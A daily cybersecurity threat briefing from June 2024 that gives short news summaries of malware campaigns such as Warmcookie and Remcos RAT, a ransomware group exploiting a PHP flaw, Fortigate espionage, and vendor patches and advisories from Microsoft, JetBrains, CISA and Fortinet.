Cyware Daily Threat Intelligence

Daily Threat Briefing • Jun 12, 2024
This website uses cookies and similar technologies to provide essential functionality and improve your experience. Some features, such as demo scheduling and chat support, require marketing cookies to function. By clicking "Accept All", you consent to all cookies. Alternatively, you can customize your preferences, but note that declining marketing cookies will limit certain website features.
Daily Threat Briefing • Jun 12, 2024
Imagine, if you will, an email arriving in your inbox, adorned with promises of career advancement and lucrative opportunities. But beware! Enter Warmcookie, a new Windows malware that sneaks into corporate networks through fake job offer phishing lures. Once activated, it conducts extensive machine fingerprinting, captures screenshots, and deploys additional payloads.
Microsoft's Patch Tuesday has rolled out, tackling a whopping 49 vulnerabilities. Among these, a critical flaw in MSMQ stands out like a glaring beacon. But that's not all. In the mix is a publicly disclosed zero-day vulnerability in DNSSEC validation.
The Smishing Triad, a notorious threat group, has broadened its sinister reach to Pakistan. Its latest ploy targets mobile carrier customers with deceptive messages that masquerade as official communications from Pakistan Post. In a bid to slip past detection, the group employs local phone numbers and domain names, blending seamlessly into the digital landscape.
Don’t be fooled by Warmcookie
A new Windows malware called Warmcookie is being distributed through fake job offer phishing campaigns to infiltrate corporate networks. The malware is capable of extensive machine fingerprinting, capturing screenshots, and deploying additional payloads. The phishing emails contain links to fake job platforms that redirect to malicious landing pages. Once executed, the malware establishes communication with a C2 server, collects victim information, captures screenshots, executes commands, and evades analysis environments.
Fake shipping lures drop Remcos RAT
Researchers spotted a new phishing campaign where threat actors are distributing Remcos RAT using UUEncoding file attachments in emails related to importing or exporting shipments. The UUEncoding files contain an obfuscated VBS script, which, when decoded, saves and executes a PowerShell script that ultimately downloads the Remcos RAT malware. The malware collects system information and keylogging data, sending it to a remote command-and-control server.
TellYouThePass abuses PHP bug
The TellYouThePass ransomware group exploited a critical flaw in PHP on Windows servers after a proof-of-concept script was released. The attackers used the flaw to execute arbitrary code, deploying ransomware through webshell uploads and launching attacks using mshta.exe. The ransomware sends details about infected machines to a command-and-control server and then publishes a ransom message in the web directory.
**Chinese Fortigate campaign **
The Dutch NCSC warned that a Chinese cyber-espionage campaign, targeting vulnerable Fortigate network security appliances, is larger than initially known. Chinese hackers exploited a critical flaw in FortiOS/FortiProxy, breaching thousands of systems belonging to Western governments, international organizations, and defense contractors. The hackers deployed a previously unknown malware that can persist despite security upgrades, potentially allowing access to sensitive data. Organizations are urged to apply measures to limit the impact of successful digital attacks.
JetBrains warns of IntelliJ IDE flaw
JetBrains issued a warning about a critical vulnerability affecting its IntelliJ IDEs, resulting in exposure of GitHub access tokens. The security flaw, tracked as CVE-2024-37051, affects IntelliJ-based IDEs from version 2023.1 onwards when the JetBrains GitHub plugin is enabled. JetBrains has released security updates to fix the vulnerability and has removed impacted versions from its plugin marketplace. Users are urged to update their IDEs and revoke any GitHub tokens used with the vulnerable plugin.
Smishing Triad targets Pakistan
The Smishing Triad threat group has expanded its operations to Pakistan, targeting mobile carrier customers with fraudulent messages appearing to be from Pakistan Post. The messages prompt victims to provide personal and financial information under the guise of paying for a package. The group's activity involves using local phone numbers and domain names to evade detection. The National Cyber Emergency Response Team of Pakistan has issued a security advisory to citizens to protect themselves.
Microsoft June 2024 Patch Tuesday
Microsoft's June 2024 Patch Tuesday addressed 49 vulnerabilities, including a critical Microsoft Message Queuing (MSMQ) RCE flaw (CVE-2024-30080) and a publicly disclosed zero-day DNSSEC validation vulnerability (CVE-2023-50868). Additionally, a Windows Wi-Fi Driver vulnerability was identified, allowing remote code execution within Wi-Fi range. The MSMQ bug has a severity rating of 9.8.
**ICS security advisories **
CISA released six ICS advisories on June 11, addressing security issues, vulnerabilities, and exploits in Industrial Control Systems (ICS). The affected products include Rockwell Automation ControlLogix, GuardLogix, and CompactLogix; AVEVA PI Web API and PI Asset Framework Client; Intrado 911 Emergency Gateway; Schneider Electric APC Easy UPS Online Monitoring Software; and MicroDicom DICOM Viewer. The CISA encourages users and administrators to review the advisories for technical details and mitigations.
Fortinet security update
Fortinet has released security updates to fix a vulnerability in FortiOS, which could allow cyber threat actors to take control of affected systems. The vulnerability is a multiple buffer overflow in the Diag Npu Command. Users and administrators are encouraged to review the Fortinet Security Bulletin and apply the necessary updates.